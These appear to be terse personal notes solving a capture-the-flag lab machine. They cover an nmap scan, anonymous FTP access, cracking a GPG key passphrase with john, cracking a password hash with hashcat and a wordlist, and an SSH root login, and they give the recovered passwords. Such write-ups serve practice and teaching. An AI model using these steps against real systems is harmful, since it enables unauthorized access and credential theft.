export ip=10.10.171.205

nmap scan {nmap -sC -sV -oN nmap/initial $ip}

FTP Anonymous login allow

cd /home
cd melodias
get user.txt



root : 


go to notread dir

get gpg file

gpg --import private.asc {we need a passwd :O}

crack the pass via john {gpg2john private.asc > fromjohn.txt}

then crack the hash {sudo john fromjohn.txt}

pass will be xbox360


gpg --decrypt backup.pgp

crack the hash with hashcat {hashcat -m 1800 hash.txt --wordlist /root/Desktop/rockyou.txt}


login on ssh as root with the passwd `hirako`

cat root.txt




